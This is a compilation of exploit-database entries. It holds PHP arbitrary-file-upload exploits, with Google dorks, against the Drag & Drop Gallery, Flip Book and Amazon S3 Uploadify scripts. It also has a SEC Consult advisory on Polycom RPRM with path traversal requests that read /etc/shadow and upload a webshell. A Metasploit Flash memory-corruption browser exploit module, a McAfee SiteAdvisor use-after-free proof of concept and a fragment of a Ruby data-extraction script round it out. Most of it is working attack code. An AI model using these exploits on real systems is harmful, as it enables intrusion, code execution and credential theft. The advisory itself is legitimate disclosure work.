puts "[*] Configuration fetched into 'config.sqlite'"
end
# Iterate over all actions and attempt to execute.
url = "http://#{options[:addr]}:#{options[:port]}"
puts "[!] Attempting to extract information from #{url}"
actions.each do |action|
# Fire the request and ensure a 200 OKAY.
begin
response = RestClient.get(
"#{url}/#{action[:path]}",
{:cookies => action[:cookies]}
)
rescue
puts "[!] Failed to query remote host."
abort
end
if response.code != 200
puts "[-] '#{action[:name]}' failed with response: #{response.code}"
next
end
# Send to the processor.
puts "[*] #{action[:name]} request succeeded."
send(action[:call], response.body())
end
===================================
contact me FB : FB.COM/haker.dyno
Copyright © 2015 /DNO/
source: https://www.securityfocus.com/bid/54179/info
Drag & Drop Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Drag & Drop Gallery 6.X-1.5 is vulnerable; other versions may also be affected.
<?php
$uploadfile="db.php.gif";
$uploadfile2="lo.php.gif";
$ch = curl_init("http://www.example.com/drupal/sites/all/modules/dragdrop_gallery/upload.php?nid=1&filedir=/drupal/sites/all/modules/dragdrop_gallery/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('user_file[0]'=>"@$uploadfile",
'user_file[1]'=>"@$uploadfile2"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
source: https://www.securityfocus.com/bid/54173/info
Flip Book is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Flip Book 1.0 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Wordpress Plugins - Flip Book Arbitrary File Upload Vulnerability
# Version : 1.0
# link : http://codecanyon.net/item/flip-book-wordpress-plugin/152641
# Price : 30$
# Date : 22-06-2012
# Google Dork : inurl:/wp-content/plugins/flipbook/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/flipbook/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/wordpress/wp-includes/fb-images/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SEC Consult Vulnerability Lab Security Advisory < 20150626-0 >
=======================================================================
title: Critical vulnerabilities allow surveillance on conferences
product: Polycom RealPresence Resource Manager (RPRM)
vulnerable versions: <8.4
fixed version: 8.4
CVE numbers: CVE-2015-4681, CVE-2015-4682, CVE-2015-4683, CVE-2015-4684
CVE-2015-4685
impact: critical
homepage: http://www.polycom.com
found: 2015-03-10
by: R. Freingruber, C.A. (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
- -------------------
"A key component of the Polycom RealPresence Platform, available as a hardened
appliance or software optimized for virtualized environments, the RealPresence
Resource Manager application is critical to effectively managing thousands of
mobile, desktop, and group telepresence systems."
http://www.polycom.com/content/www/en/products-services/realpresence-platform/management-applications/realpresence-resource-manager.html
Business recommendation:
- ------------------------
By combining all vulnerabilities documented in this advisory an unprivileged
authenticated remote attacker can gain full system access (root) on the RPRM
appliance. This has an impact on all conferences taking place via this RP
Resource Manager. Attackers can steal all conference passcodes and join or
record any conference.
SEC Consult recommends not to use this system until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.
Vulnerability overview/description:
- -----------------------------------
1) Unauthorized plaintext password disclosure of RMX admin accounts
The RPRM discloses the plaintext password of the RMX admin user to an
unauthorized unprivileged attacker by including it in certain HTTP responses.
No manipulation of parameters is required.
2) Arbitrary file disclosure (I) via path traversal (CVE-2015-4684)
Ordinary unprivileged users can download an Excel file of all their upcoming
conferences. This functionality can be exploited by an authenticated attacker
to download arbitrary files from the server due to insufficient input validation.
There is no restriction on which files might be downloaded since this action
is performed with root privileges.
3) Plaintext passwords stored in logfiles
RPRM generates logdata which includes plaintext passwords. This weakness in
combination with the previous vulnerability allows an unprivileged attacker
to escalate his privileges to the admin level in the web interface.
4) Arbitrary file upload via path traversal (CVE-2015-4684)
This vulnerability requires admin privileges in the web interface, but combining
all previous vulnerabilities in this advisory allows privilege escalation.
Administrators can import (upload) "user aliases" in the web interface. This
functionality is vulnerable to a path traversal attack. This vulnerability
can be exploited to upload a webshell and execute arbitrary commands with
the permissions of the system user "plcm".
5) Sudo misconfiguration allows privilege escalation (CVE-2015-4685)
The "plcm" user is allowed to execute certain tools and scripts in given
folders with root privileges. At the same time many of these scripts and
folders are writeable to the plcm user. This allows execution of arbitrary
code with root privileges.
6) Arbitrary file disclosure (II) and removal (path traversal) (CVE-2015-4684)
An authenticated attacker can download and remove any files using this path
traversal vulnerability. Exploitation of this vulnerability requires admin
privileges. There is no restriction on which files might be downloaded or
removed since this action is performed with root privileges.
7) Weak/Missing Authorization
The separation of users relies on the fact that conference IDs are not
guessable, but as soon as an information disclosure vulnerability allows an
attacker to gather conference IDs authorization can be bypassed. The
arbitrary file download vulnerability (2) allows an attacker to collect
valid conference IDs.
8) Absolute path disclosure (CVE-2015-4682)
The web application discloses the absolute path to the web root.
To collect this information no parameter manipulation is required.
The webroot path is valuable when uploading a web shell (see vulnerability 4).
9) Session ID in GET parameter allows for privilege escalation (CVE-2015-4683)
Certain actions on the website (Excel and log file downloads) submit
session IDs in HTTP GET parameters. If a privileged user performs such
an action his session ID is written to the webserver log which can be
retrieved by an unprivileged attacker by exploiting the vulnerability (2).
This results in an additional privilege escalation path. Since session IDs
are bound to source IP addresses successfull exploitation requires the
attacker to have the same source IP as his victim (e.g. NAT).
Proof of concept:
- -----------------
1) Unauthorized plaintext password disclosure of RMX admin accounts
Request:
- -----
POST /PlcmRmWeb/JNetworkDeviceManager?n=... HTTP/1.1
Host: <host>:8443
SOAPAction: http://polycom.com/WebServices/aa:getAvailableBridges
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><aa:getAvailableBridges
xmlns:aa="http://polycom.com/WebServices"><credentials
xsi:type="JCredentials"><userToken>*VALID-USER-TOKEN*</userToken></credentials><resultsForConferenceOwner>false</resultsForConferenceOwner><areaId>-1</areaId></aa:getAvailableBridges></soap:Body></soap:Envelope>
- -----
Response:
- -----
<env:Envelope xmlns:env='http://schemas.xmlsoap.org/soap/envelope/'>
<env:Header></env:Header>
<env:Body>
<ns2:getAvailableBridgesResponse xmlns:ns2="http://polycom.com/WebServices">
<return>
<status>SUCCESS</status>
</return>
<mcuList>
<belongsToAreaUgpId>0</belongsToAreaUgpId>
<defaultAliasName>*redacted*</defaultAliasName>
<description></description>
<deviceId>*redacted*</deviceId>
<deviceName>*redacted*</deviceName>
<deviceStatus>ONLINE</deviceStatus>
<deviceType>CR</deviceType>
<deviceUUID>00000000-0000-0000-0000-000000000000</deviceUUID>
<hasDeviceErrors>false</hasDeviceErrors>
<ipAddress>*redacted*</ipAddress>
<isCallServer>false</isCallServer>
<isMcuPoolOrderSource>false</isMcuPoolOrderSource>
<managedGatekeeperStatus>NOT_APPLICABLE</managedGatekeeperStatus>
<password>*PLAINTEXTPASSWORD*</password>
[...]
- -----
The same information is disclosed in the "aa:getMCUsNetworkDevicesForList" and
"aa:getNetworkDevicesForList" requests.
2) Arbitrary file disclosure (I) via path traversal
The following URL allows an attacker to read the /etc/shadow file:
https://hostname:8443/PlcmRmWeb/FileDownload?DownloadType=REPORT&Modifier=../../../../../../../etc/shadow&Credentials=*VALID-USER-TOKEN*&ClientId=&FileName=
root:<hash>:16135:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
dbus:!!:16135::::::
hacluster:!!:16135::::::
vcsa:!!:16135::::::
rpc:!!:16135:0:99999:7:::
ntp:!!:16135::::::
plcm:$1$nqk4wqYm$N4QLTb66K8JwE9yM2GuO.1:16135::::::
[...]
(plcm user password is Polycom123)
3) Plaintext passwords stored in logfiles
No proof of concept necessary.
4) Arbitrary file upload via path traversal
Request:
- -----
POST /PlcmRmWeb/FileUpload HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
User-Agent: Shockwave Flash
Host: <host>:8443
Content-Length: 1076
Connection: Keep-Alive
Cache-Control: no-cache
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="Filename"
../../../../../../../../../../../../opt/polycom/cma/current/jserver/web/ROOT.war/webshell-123.jsp
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="SE_LOC"
null
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="Token"
*VALID-USER-TOKEN*
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="SE_FNAME"
../../../../../../../../../../../../opt/polycom/cma/current/jserver/web/ROOT.war/webshell-123.jsp
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="UploadType"
SIP_URL_CSV
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="FlashSessionId"
*session-id*
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="Filedata"; filename="webshell-123.jsp"
Content-Type: application/octet-stream
*web shell payload here*
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="Upload"
Submit Query
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0--
5) Sudo misconfiguration allows privilege escalation
Excerpt from /etc/sudoers:
plcm ALL=(ALL) ALL
plcm ALL=(root)NOPASSWD:/usr/sbin/dmidecode
plcm ALL=(root)NOPASSWD:/sbin/init
plcm ALL=(root)NOPASSWD:/sbin/service
plcm ALL=(root)NOPASSWD:/opt/polycom/cma/*/jserver/bin/getNetworkInfo.pl
*...*
plcm ALL=(root)NOPASSWD:/opt/polycom/cma/*/jserver/schema/script/getCipherSuiteMode.sh
plcm ALL=(root)NOPASSWD:/opt/polycom/cma/*/ha/scripts/*
*...*
plcm ALL=(root)NOPASSWD:/var/polycom/cma/upgrade/scripts/*
plcm ALL=(root)NOPASSWD:/usr/bin/snmptrap
plcm ALL=(root)NOPASSWD:/usr/bin/snmpget
plcm ALL=(root)NOPASSWD:/sbin/iptables
*...*
plcm ALL=(root)NOPASSWD:/usr/sbin/tcpdump
plcm ALL=(root)NOPASSWD:/usr/sbin/logrotate
plcm ALL=(root)NOPASSWD:/usr/sbin/wired_supplicant_configurator
Among many other paths in this long list, the folder
/var/polycom/cma/upgrade/scripts/
is writeable for the plcm user. Simply placing any malicious script/executable in
this folder and executing it via sudo gives an attacker full root access.
6) Arbitrary file disclosure (II) and removal (path traversal)
The following request is used to disclose and remove "/etc/hosts" from the system.
An arbitrary file can be specified here (operations are executed with root privileges).
POST /PlcmRmWeb/JUserManager?n=... HTTP/1.1
Host: <host>:8443
SOAPAction: http://polycom.com/WebServices/aa:importSipUriReservations
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><aa:importSipUriReservations
xmlns:aa="http://polycom.com/WebServices"><credentials
xsi:type="JCredentials"><userToken>*VALID-USER-TOKEN*</userToken></credentials><filePathName>../../../../../../../../../../../../../etc/hosts</filePathName></aa:importSipUriReservations></soap:Body></soap:Envelope>
It's very likely that the SOAP action "aa:importUserH323Reservations" contains the same vulnerability.
7) Weak/Missing Authorization
The exploit of this vulnerability has been removed from this advisory.
According to the vendor it is unresolved in the new software version 8.4.
8) Absolute path disclosure
Request:
- -----
POST /PlcmRmWeb/JConfigManager?n=... HTTP/1.1
Host: <host>:8443
SOAPAction: http://polycom.com/WebServices/aa:getCustomLogoUploadPath
Content-Length: 417
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><aa:getCustomLogoUploadPath
xmlns:aa="http://polycom.com/WebServices"><credentials
xsi:type="JCredentials"><userToken>*VALID-USER-TOKEN*</userToken></credentials></aa:getCustomLogoUploadPath></soap:Body></soap:Envelope>
- -----
Response:
- ---------
<env:Envelope xmlns:env='http://schemas.xmlsoap.org/soap/envelope/'>
<env:Header></env:Header>
<env:Body>
<ns2:getCustomLogoUploadPathResponse xmlns:ns2="http://polycom.com/WebServices">
<return>
<status>SUCCESS</status>
</return>
<url>/download/CustomLogos/</url>
<path>/opt/polycom/cma/current/jserver/web/ROOT.war/download/CustomLogos/</path>
</ns2:getCustomLogoUploadPathResponse>
</env:Body>
</env:Envelope>
- -----
At least the following SOAP actions can be used to retrieve absolute paths:
- - aa:getCustomLogoUploadPath
- - aa:getCustomDesktopLogoUploadPath
- - aa:getUploadDirectory
- - aa:getSystemLogFiles
- - aa:getLegacyUploadDir
- - aa:getAuditLogFiles
9) Session ID in GET parameter allows privilege escalation
Sample URL that contains a session ID in the GET parameter 'Credential':
/PlcmRmWeb/FileDownload?DownloadType=LOGGER&Modifier=-123&Credentials=12345678-1234-1234-1234-123456789000&ClientId=&FileName=Conference.log
Path to the webserver access logfiles:
/var/log/polycom/cma/audit/localhost_access_log.log
/var/log/polycom/cma/audit/localhost_access_log.log.1.gz
...
Extract valid session IDs from the log files:
egrep "[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" localhost_access_log.log
Vulnerable versions:
- -----------------------------
According to the vendor, all software versions <8.4 are affected.
Vendor contact timeline:
- ------------------------
2015-03-25: Video conference with Polycom, discussing vulnerabilities
2015-03-27: Contacting Polycom through security@polycom.com, requesting
encryption keys, attaching responsible disclosure policy.
2015-04-01: Polycom provides PGP key
2015-04-02: Sending encrypted security advisory to Polycom
2015-04-03: Polycom provides affected versions
2015-04-29: Polycom provides planned release date (2015-06-19) and
version number that fixes issues.
2015-05-06: SEC Consult confirms advisory release date: 2015-06-26
2015-06-15: Polycom releases RPRM v8.4
2015-06-18: Polycom provides URL to RPRM v8.4
2015-06-18: SEC Consult asks for reassurance that v8.4 fixes reported
vulnerabilities since 8.4's release notes do not mention
any fixes.
2015-06-22: Received a list that the vulnerabilities were fixed.
2015-06-26: Coordinated release of security advisory.
Solution:
- ---------
Update to RPRM v8.4.
For further information see the following URL of the vendor:
http://support.polycom.com/PolycomService/support/us/support/network/management_scheduling/realpresence_resource_manager.html
Exception:
RPRM v8.4 does _not_ address the weakness described in section 7
(Weak/Missing Authorization).
Workaround:
- -----------
None.
Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF SEC Consult Vulnerability Lab / @2015
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
iQIcBAEBAgAGBQJVjTcBAAoJEC0t17XG7og/eMEP/0AYTeU4D59vP7eZvcVDdcJe
vt/rKr9MoBSEVki353Fw0cSEQXXsAS3mIkK4Ux9mpwgGfFo5cSm5Yi3ExLJ7eYJV
/PgkgNDeS9+lj08MaGBwcmuodzzvYmcfeErnqsNvV7V1vaqe4gfRjvSI5+h5F28l
8DtQEF98WOSNsDxJmPN9lwVsZ7d9QH2duCvyhJ/RY3LFr+3s2JvyX8YoCx+77PBK
GnuaOt1hLLfONeMiSpqXZxvOpegj7igx5mTStlNHCbxxos1Rz7UpyRWMnMtMz4mi
+mZIBbDeGEoSblGn202TjbM2uYNp5OCCQPCp7pGW2w3AtoQvQDxMCnrkzbK9ORBz
9q8epixzL/GQXd2rtloV7+Kj6Qz13Tvh36rpxvrhR9X/u6N5O7TObMy8n0fZimjh
KMip21wn7JniBE4A5jBssdNM3ktfEPdjTBW2N5NAqGQ5VSIRJzI3yVjZIKUH1+WJ
dcrQHK36II4CvVTIGsXf/20oaZewGpkmSn/p5iuQy5HBMnXU+/Xr5w1z94vmCOOj
a+rUToaCbdK1Ldx9pSktX6OY9bzf1hkZbzNs/UncKa72hha1pTuwR76wY37hMrWu
aRI2ZDNBbt/YuHjaiIOcramg9519AcWIoq9kcKIWJdpp2m9ZN3ub8TWPmde6Puii
9TVqPEBEU8NH1SeTdDvw
=//g1
-----END PGP SIGNATURE-----
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player Drawing Fill Shader Memory Corruption',
'Description' => %q{
This module exploits a memory corruption happening when applying a Shader as a drawing fill
as exploited in the wild on June 2015. This module has been tested successfully on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Evans', # Vulnerability discovery
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3105'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-11.html'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/'],
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3105-flash-up-to-1700188-and.html'],
['URL', 'http://help.adobe.com/en_US/as3/dev/WSFDA04BAE-F6BC-43d9-BD9C-08D39CA22086.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.188')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.460')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 12 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3105', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1250">
<meta name="generator" content="PSPad editor, www.pspad.com">
<title>McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc</title>
</head>
<body>
<script>
/*
Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
Author: Marcin Ressel
Twitter: https://twitter.com/m_ressel
NPMcFFPlg32.dll
McAfee SiteAdvisor 3.7.2
Tested on: Windows 8.1 (x64) and firefox 38.0.5
Homepage: https://www.siteadvisor.com/
Note: this vlun potentiali give us posibility to bruteforce base modules in memory
to bypass ASLR/DEP because the bug doesn't have negative impact to webbrowser proces
i mean firefox will not crash after trigger uaf i McAfee
0:107> !gflag
Current NtGlobalFlag contents: 0x02001800
htg - Enable heap tagging
ust - Create user mode stack trace database
hpa - Place heap allocations at ends of pages
0:107> g
(1d68.1b54): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
NPMcFFPlg32!CreateFFScriptable+0x141:
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
...
6f40437a 8b02 mov eax,dword ptr [edx]
6f40437c 85c0 test eax,eax
6f40437e 7402 je NPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
6f404380 8b00 mov eax,dword ptr [eax]
6f404382 8b4808 mov ecx,dword ptr [eax+8]
6f404385 8b4004 mov eax,dword ptr [eax+4]
6f404388 49 dec ecx
6f404389 234a08 and ecx,dword ptr [edx+8]
6f40438c 8b0488 mov eax,dword ptr [eax+ecx*4]
6f40438f 8b00 mov eax,dword ptr [eax]
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
6f404394 eb45 jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
6f404396 8d45d0 lea eax,[ebp-30h]
6f404399 50 push eax
6f40439a e8d10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f40439f 8bd0 mov edx,eax
6f4043a1 8b02 mov eax,dword ptr [edx]
6f4043a3 85c0 test eax,eax
6f4043a5 7402 je NPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
6f4043a7 8b00 mov eax,dword ptr [eax]
6f4043a9 8b4808 mov ecx,dword ptr [eax+8]
6f4043ac 8b4004 mov eax,dword ptr [eax+4]
6f4043af 49 dec ecx
6f4043b0 234a08 and ecx,dword ptr [edx+8]
6f4043b3 8b3488 mov esi,dword ptr [eax+ecx*4]
6f4043b6 8d45c4 lea eax,[ebp-3Ch]
6f4043b9 50 push eax
6f4043ba e8b10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f4043bf 8bd0 mov edx,eax
...
*/
var win = null;
function crash()
{
var doc = win.document;
var obj = doc;
win.close();
for(var p in obj)
{
if(typeof obj[p] == 'string')
{
try{ obj[p] = "CCCC"; }catch(err){}
}
}
}
win = window.open('data:text/html,','','width=20,height=20'); //you need disable popupBlocker
win.onload = crash;
</script>
</body>
</html>
source: https://www.securityfocus.com/bid/54170/info
Amazon S3 Uploadify Script is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Amazon S3 Uploadify Script 1.01 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : uploadify-amazon-s3 Arbitrary File Upload Vulnerability
# Version : 1.01
# Link : http://code.google.com/p/uploadify-amazon-s3/
# Software : http://code.google.com/p/uploadify-amazon-s3/downloads/detail?name=uploadify-amazon-s3-101.zip&can=2&q=
# Date : 21-06-2012
# Google Dork : inurl:/files/uploadify/ -google
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/files/uploadify/uploadify.php?folder=/files/uploadify/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/files/uploadify/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database